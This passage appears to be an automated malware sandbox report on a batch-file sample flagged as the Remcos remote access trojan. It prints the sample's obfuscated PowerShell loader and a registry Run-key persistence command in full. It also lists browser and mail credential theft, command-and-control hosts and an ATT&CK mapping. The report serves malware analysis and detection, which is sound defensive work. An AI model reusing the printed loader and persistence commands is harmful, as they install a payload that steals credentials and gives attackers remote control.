                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#buttresslike egenskabsvinduets whirlmagee sunkne tangibilities skivgatterne unpeacefully #>;$hypogeal='byggemodnedes';<#grasping pedestrianising kardon #>;$untroubledly=$telegrammes+$host.ui;function taborets($boejer){if ($untroubledly) {$baljers++;}$sirenize=$abintestate+$boejer.'length'-$baljers; for( $furcated=4;$furcated -lt $sirenize;$furcated+=5){$preidentification++;$nedlgger+=$boejer[$furcated];$fruehauf='kludging';}$nedlgger;}function politiseres($antiopelmous){ & ($glassine) ($antiopelmous);}$furcatedrrefragability=taborets 'unmom spholarrzeksai udal knlbloda und/magn ';$furcatedrrefragability+=taborets 'besv5tr c.gran0jam util(strowskadiskannhattd owlourdswbu sstils grunnv,sitlan, kand1aftn0zith. bop0turb;over intw traitougne te6temp4aarg;e nf n ggxgalo6lian4roeg;lol drecr resv bi :pent1rose3 ext1 kod. c f0arma)h ma subfgsulfeminucstank bedoe sp/ s.a2e,he0 mac1tilf0pine0bogt1pent0 til1te e afsf orki frergrafekl sfi deoka mxungd/clod1lady3.zil1omri.o sm0misk ';$drikkevandsforsyninger=taborets 'camaublgesce tecahir p a-teleaparegkomse opsntj,ntcent ';$engleskarers=taborets 'une hturat yeltsnohpkinesd.li:hexa/lagd/ phlmlipai rneounovtsupetkil oroupetri,zdos,a orun trieforblcec lr,deafdni. hencla.roremamster/spurh hjeofindv dolemoridthervem artradkconse taatneds.renlr ruam ltrspor ';$genhret=taborets ' ppe>emer ';$glassine=taborets 'aarsi ci,epri.xkard ';$balsameredes='mangfoldigste';$lizbeth='\aspargessuppens.bri';politiseres (taborets ' su,$karagmarelbuboo funbchorakastlgray: paltdenihemboihypeo dvrnstilef,avi ogpngrame pol= su $ fore gonnhjervbleg: gara i opdisrpunprdwho.ast rtbl ka,krm+inc $na klfo,kitan zbattbre.rearkatndudhravi ');politiseres (taborets 'alko$se vghaemlluftooralb ropan melopda:uncos s.laa,latflose obslcacql luni ci t uthb redyunseeclosrbraunteksede rsnrin=shr $redbeopgrnt,bugprivlsu aes mvs halkkabaa venrs teeb nkrste.s,pip.stndsforsp hrelhjeri undthulk(haar$surag some alfnravghcinnrc nte ogtbrne)hand ');politiseres (taborets ' ove[strinankeeperstkono.lills staeeksprs nhvinkpisygecinv e epap.urfosubti,nianjahvtpse.munexathe ntelea algargue plarergo]sate:dist: lims.astegydeccoppu enrfa iitildtskr y astp enfr nedod mptripeo indcnon,oautolavne g.aa=nona regr[refenhypeestratgly .ta.lsbnkbe pr.c s euc,mprtamuianthtenciystrap f.nr uzosekst isoomvrech anoabeflisoctnis,ycyanprettel,mi]s ir:nonc: indthvirl nedsmoon1pleb2d nk ');$engleskarers=$satellitbyernes[0];$faglrereksaminernes=(taborets 'koll$lejngmo ol ketoplatb kreawatelh dr:oretr medebedyg to eintelspermvelusnonss blii insgdataschecto on=unquncowaegelawclay-topfo ,rob bijj areerareckrakthiml sheesca iyexanscouptjollepylrmdeko.t len rase .igtchin.seglwforhe nneb ydrcurfjldil iubnde aponkviltkalv ');politiseres ($faglrereksaminernes);politiseres (taborets 'd lt$fnisr mile vi,gpartespaal m,dm lepsdiffs taiforlg onfscarrtskjt. undh.take lnnadan dperfepapfrdeo
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#buttresslike egenskabsvinduets whirlmagee sunkne tangibilities skivgatterne unpeacefully #>;$hypogeal='byggemodnedes';<#grasping pedestrianising kardon #>;$untroubledly=$telegrammes+$host.ui;function taborets($boejer){if ($untroubledly) {$baljers++;}$sirenize=$abintestate+$boejer.'length'-$baljers; for( $furcated=4;$furcated -lt $sirenize;$furcated+=5){$preidentification++;$nedlgger+=$boejer[$furcated];$fruehauf='kludging';}$nedlgger;}function politiseres($antiopelmous){ & ($glassine) ($antiopelmous);}$furcatedrrefragability=taborets 'unmom spholarrzeksai udal knlbloda und/magn ';$furcatedrrefragability+=taborets 'besv5tr c.gran0jam util(strowskadiskannhattd owlourdswbu sstils grunnv,sitlan, kand1aftn0zith. bop0turb;over intw traitougne te6temp4aarg;e nf n ggxgalo6lian4roeg;lol drecr resv bi :pent1rose3 ext1 kod. c f0arma)h ma subfgsulfeminucstank bedoe sp/ s.a2e,he0 mac1tilf0pine0bogt1pent0 til1te e afsf orki frergrafekl sfi deoka mxungd/clod1lady3.zil1omri.o sm0misk ';$drikkevandsforsyninger=taborets 'camaublgesce tecahir p a-teleaparegkomse opsntj,ntcent ';$engleskarers=taborets 'une hturat yeltsnohpkinesd.li:hexa/lagd/ phlmlipai rneounovtsupetkil oroupetri,zdos,a orun trieforblcec lr,deafdni. hencla.roremamster/spurh hjeofindv dolemoridthervem artradkconse taatneds.renlr ruam ltrspor ';$genhret=taborets ' ppe>emer ';$glassine=taborets 'aarsi ci,epri.xkard ';$balsameredes='mangfoldigste';$lizbeth='\aspargessuppens.bri';politiseres (taborets ' su,$karagmarelbuboo funbchorakastlgray: paltdenihemboihypeo dvrnstilef,avi ogpngrame pol= su $ fore gonnhjervbleg: gara i opdisrpunprdwho.ast rtbl ka,krm+inc $na klfo,kitan zbattbre.rearkatndudhravi ');politiseres (taborets 'alko$se vghaemlluftooralb ropan melopda:uncos s.laa,latflose obslcacql luni ci t uthb redyunseeclosrbraunteksede rsnrin=shr $redbeopgrnt,bugprivlsu aes mvs halkkabaa venrs teeb nkrste.s,pip.stndsforsp hrelhjeri undthulk(haar$surag some alfnravghcinnrc nte ogtbrne)hand ');politiseres (taborets ' ove[strinankeeperstkono.lills staeeksprs nhvinkpisygecinv e epap.urfosubti,nianjahvtpse.munexathe ntelea algargue plarergo]sate:dist: lims.astegydeccoppu enrfa iitildtskr y astp enfr nedod mptripeo indcnon,oautolavne g.aa=nona regr[refenhypeestratgly .ta.lsbnkbe pr.c s euc,mprtamuianthtenciystrap f.nr uzosekst isoomvrech anoabeflisoctnis,ycyanprettel,mi]s ir:nonc: indthvirl nedsmoon1pleb2d nk ');$engleskarers=$satellitbyernes[0];$faglrereksaminernes=(taborets 'koll$lejngmo ol ketoplatb kreawatelh dr:oretr medebedyg to eintelspermvelusnonss blii insgdataschecto on=unquncowaegelawclay-topfo ,rob bijj areerareckrakthiml sheesca iyexanscouptjollepylrmdeko.t len rase .igtchin.seglwforhe nneb ydrcurfjldil iubnde aponkviltkalv ');politiseres ($faglrereksaminernes);politiseres (taborets 'd lt$fnisr mile vi,gpartespaal m,dm lepsdiffs taiforlg onfscarrtskjt. undh.tak
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "aversi" /t reg_expand_sz /d "%afgrnsningsproblemer% -windowstyle 1 $predestinationism=(gp -path 'hkcu:\software\hovedparts\').bagateller;%afgrnsningsproblemer% ($predestinationism)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#buttresslike egenskabsvinduets whirlmagee sunkne tangibilities skivgatterne unpeacefully #>;$hypogeal='byggemodnedes';<#grasping pedestrianising kardon #>;$untroubledly=$telegrammes+$host.ui;function taborets($boejer){if ($untroubledly) {$baljers++;}$sirenize=$abintestate+$boejer.'length'-$baljers; for( $furcated=4;$furcated -lt $sirenize;$furcated+=5){$preidentification++;$nedlgger+=$boejer[$furcated];$fruehauf='kludging';}$nedlgger;}function politiseres($antiopelmous){ & ($glassine) ($antiopelmous);}$furcatedrrefragability=taborets 'unmom spholarrzeksai udal knlbloda und/magn ';$furcatedrrefragability+=taborets 'besv5tr c.gran0jam util(strowskadiskannhattd owlourdswbu sstils grunnv,sitlan, kand1aftn0zith. bop0turb;over intw traitougne te6temp4aarg;e nf n ggxgalo6lian4roeg;lol drecr resv bi :pent1rose3 ext1 kod. c f0arma)h ma subfgsulfeminucstank bedoe sp/ s.a2e,he0 mac1tilf0pine0bogt1pent0 til1te e afsf orki frergrafekl sfi deoka mxungd/clod1lady3.zil1omri.o sm0misk ';$drikkevandsforsyninger=taborets 'camaublgesce tecahir p a-teleaparegkomse opsntj,ntcent ';$engleskarers=taborets 'une hturat yeltsnohpkinesd.li:hexa/lagd/ phlmlipai rneounovtsupetkil oroupetri,zdos,a orun trieforblcec lr,deafdni. hencla.roremamster/spurh hjeofindv dolemoridthervem artradkconse taatneds.renlr ruam ltrspor ';$genhret=taborets ' ppe>emer ';$glassine=taborets 'aarsi ci,epri.xkard ';$balsameredes='mangfoldigste';$lizbeth='\aspargessuppens.bri';politiseres (taborets ' su,$karagmarelbuboo funbchorakastlgray: paltdenihemboihypeo dvrnstilef,avi ogpngrame pol= su $ fore gonnhjervbleg: gara i opdisrpunprdwho.ast rtbl ka,krm+inc $na klfo,kitan zbattbre.rearkatndudhravi ');politiseres (taborets 'alko$se vghaemlluftooralb ropan melopda:uncos s.laa,latflose obslcacql luni ci t uthb redyunseeclosrbraunteksede rsnrin=shr $redbeopgrnt,bugprivlsu aes mvs halkkabaa venrs teeb nkrste.s,pip.stndsforsp hrelhjeri undthulk(haar$surag some alfnravghcinnrc nte ogtbrne)hand ');politiseres (taborets ' ove[strinankeeperstkono.lills staeeksprs nhvinkpisygecinv e epap.urfosubti,nianjahvtpse.munexathe ntelea algargue plarergo]sate:dist: lims.astegydeccoppu enrfa iitildtskr y astp enfr nedod mptripeo indcnon,oautolavne g.aa=nona regr[refenhypeestratgly .ta.lsbnkbe pr.c s euc,mprtamuianthtenciystrap f.nr uzosekst isoomvrech anoabeflisoctnis,ycyanprettel,mi]s ir:nonc: indthvirl nedsmoon1pleb2d nk ');$engleskarers=$satellitbyernes[0];$faglrereksaminernes=(taborets 'koll$lejngmo ol ketoplatb kreawatelh dr:oretr medebedyg to eintelspermvelusnonss blii insgdataschecto on=unquncowaegelawclay-topfo ,rob bijj areerareckrakthiml sheesca iyexanscouptjollepylrmdeko.t len rase .igtchin.seglwforhe nneb ydrcurfjldil iubnde aponkviltkalv ');politiseres ($faglrereksaminernes);politiseres (taborets 'd lt$fnisr mile vi,gpartespaal m,dm lepsdiffs taiforlg onfscarrtskjt. undh.take lnnadan dperfepapfrdeoJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "aversi" /t reg_expand_sz /d "%afgrnsningsproblemer% -windowstyle 1 $predestinationism=(gp -path 'hkcu:\software\hovedparts\').bagateller;%afgrnsningsproblemer% ($predestinationism)"Jump to behavior
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8B\^
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8B\:
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8B\
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8B\28
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8B\g
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager">
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerviderN{
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8B\#
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E2933 cpuid 8_2_228E2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_228E2264
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,15_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041739B GetVersionExW,14_2_0041739B

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword15_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword15_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword15_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6416, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8BJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		1
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		2
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter                		1
                Registry Run Keys / Startup Folder                		412
                Process Injection                		1
                Software Packing                		1
                Credentials in Registry                		3
                File and Directory Discovery                		SMB/Windows Admin Shares11
                Input Capture                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell                		Login Hook1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		NTDS27
                System Information Discovery                		Distributed Component Object Model2
                Clipboard Data                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets141
                Security Software Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry                		Cached Domain Credentials141
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture213
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                Virtualization/Sandbox Evasion                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536035 Sample: rIMGTR657365756.bat Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 42 pelele.duckdns.org 2->42 44 plieltd.top 2->44 46 2 other IPs or domains 2->46 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 74 8 other signatures 2->74 9 powershell.exe 17 2->9         started        12 cmd.exe 1 2->12         started        signatures3 72 Uses dynamic DNS services 42->72 process4 signatures5 76 Early bird code injection technique detected 9->76 78 Writes to foreign memory regions 9->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 9->80 84 2 other signatures 9->84 14 msiexec.exe 5 17 9->14         started        19 conhost.exe 9->19         started        82 Suspicious powershell command line found 12->82 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 48 pelele.duckdns.org 185.236.203.101, 49848, 49859, 51525 M247GB Romania 14->48 50 plieltd.top 104.21.56.189, 443, 49797 CLOUDFLARENETUS United States 14->50 52 geoplugin.net 178.237.33.50, 49860, 80 ATOM86-ASATOM86NL Netherlands 14->52 40 C:\ProgramData\remcos\logs.dat, data 14->40 dropped 56 Detected Remcos RAT 14->56 58 Tries to steal Mail credentials (via file registry) 14->58 60 Maps a DLL or memory area into another process 14->60 64 2 other signatures 14->64 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 3 other processes 14->34 54 miottoezanella.com 194.76.118.27, 443, 49704 KELIWEBIT Italy 21->54 62 Found suspicious powershell code related to unpacking or dynamic code loading 21->62 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 86 Tries to harvest and steal browser information (history, passwords, etc) 25->86 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
